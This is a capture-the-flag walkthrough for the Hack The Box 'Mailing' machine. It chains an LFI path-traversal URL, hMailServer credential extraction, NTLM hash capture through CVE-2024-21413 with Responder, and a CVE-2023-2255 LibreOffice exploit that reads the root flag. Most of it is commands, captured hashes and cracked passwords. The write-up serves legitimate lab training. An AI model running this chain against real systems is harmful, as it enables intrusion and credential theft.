Mailing – Hack The Box – @lautarovculic

User.txt

Let’s discover the open ports with nmap

				
					sudo nmap -sS -sV --min-rate 5000  -n -Pn -T4 -vv 10.10.11.14
				
			

Output

				
					PORT    STATE SERVICE       REASON          VERSION
25/tcp  open  smtp          syn-ack ttl 127 hMailServer smtpd
80/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
110/tcp open  pop3          syn-ack ttl 127 hMailServer pop3d
135/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
143/tcp open  imap          syn-ack ttl 127 hMailServer imapd
445/tcp open  microsoft-ds? syn-ack ttl 127
465/tcp open  ssl/smtp      syn-ack ttl 127 hMailServer smtpd
587/tcp open  smtp          syn-ack ttl 127 hMailServer smtpd
993/tcp open  ssl/imap      syn-ack ttl 127 hMailServer imapd
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
				
			

Let’s add the host to our /etc/hosts file

				
					sudo echo "10.10.11.14 mailing.htb" | sudo tee -a /etc/hosts
				
			

Now we will do some enumeration

I found a LFI on the Web Application download function

				
					http://mailing.htb/download.php?file=../../windows/system32/drivers/etc/hosts
				
			

And we can get the .ini file of hMailServer

				
					[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
				
			

After crack it, the password is

				
					homenetworkingadministrator
				
			

Let’s try log in via Telnet

				
					telnet 10.10.11.14 110
				
			
				
					USER administrator@mailing.htb
+OK Send your password
PASS homenetworkingadministrator
+OK Mailbox locked and ready
LIST
+OK 0 messages (0 octets)
				
			

I remember the famous CVE of Outlook vuln then I try with this python script

Then you can run

				
					sudo responder -I tun0
				
			
				
					python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\IP' --subject test123
				
			

Then we get the NTLM hash for maya user!

				
					maya::MAILING:dac4fe0aec512cc8:0ABF7016C9D7428230E543395441DBCD:010100000000000000EF6F99469EDA01293B5F358D9EF4DE0000000002000800540058005800340001001E00570049004E002D00380038003200520041004E005000380044004500500004003400570049004E002D00380038003200520041004E00500038004400450050002E0054005800580034002E004C004F00430041004C000300140054005800580034002E004C004F00430041004C000500140054005800580034002E004C004F00430041004C000700080000EF6F99469EDA01060004000200000008003000300000000000000000000000002000009BE5ABAC0CB766267616E7031B83C21B57E7A52A6903503167DE1974F23E1F3B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000
				
			

Let’s crack it

				
					maya:m4y4ngs4ri
				
			

Now we can use evil-winrm for log in

				
					evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri
				
			
				
					PS C:\Users\maya\Desktop> type user.txt
463996f3**********68581c
PS C:\Users\maya\Desktop>
				
			

And get the user.txt flag

Root.txt

Now it’s time for root

If we enumerate about program installed

				
					reg query HKEY_LOCAL_MACHINE\SOFTWARE
				
			

We can see that there is Libre Office

And in C:\ exist Important Documents folder

I drop a file and every minute this is delete… And execute?

May be is the CVE-2023-2255

Let’s clone this repo

				
					git clone https://github.com/elweth-sec/CVE-2023-2255 && cd CVE-2023-2255
				
			

After try many methods to get a reverse shell, I took the dirty way, just type the root flag to other .txt file

				
					import subprocess
c = 'type C:\\Users\\localadmin\\Desktop\\root.txt >> C:\\Users\\maya\\Documents\\a.txt'
subprocess.run(c, shell=True)
				
			

We can call this script dirt.py and then execute this command:

				
					python3 CVE-2023-2255.py --cmd 'python C:\Users\maya\Documents\dirt.py' --output 'exploit.odt'
				
			

We have 2 files, we need copy those to /usr/share/evil-winrm/ folder for upload

				
					sudo cp dirt.py /usr/share/evil-winrm/dirt.py
				
			
				
					sudo cp exploit.odt /usr/share/evil-winrm/exploit.odt
				
			

Then in our Evil-WinRM

				
					PS C:\Users\maya\Documents> upload dirt.py
				
			
				
					PS C:\Users\maya\Documents> cd C:\
PS C:\> cd "C:/Important Documents/"
PS C:\Important Documents> upload exploit.odt
				
			

If you can’t see a.txt in Documents folder, just re-upload the .odt file or reset the machine and try again.

We will take a second an will see the a.txt file

				
					PS C:\Important Documents> dir C:\Users\maya\Documents\


    Directory: C:\Users\maya\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/13/2024   4:49 PM                WindowsPowerShell
-a----          5/5/2024   4:22 AM             34 a.txt
-a----         4/11/2024   1:24 AM            807 mail.py
-a----         3/14/2024   4:30 PM            557 mail.vbs
-a----          5/5/2024   4:14 AM            594 dirt.py
				
			

Then

				
					PS C:\Important Documents> cd  C:\Users\maya\Documents\
PS C:\Users\maya\Documents> type a.txt
417aa94e*********10c153c430
PS C:\Users\maya\Documents>
				
			

We get the root.txt flag

I hope you found it useful (:

Leave a Reply

Your email address will not be published. Required fields are marked *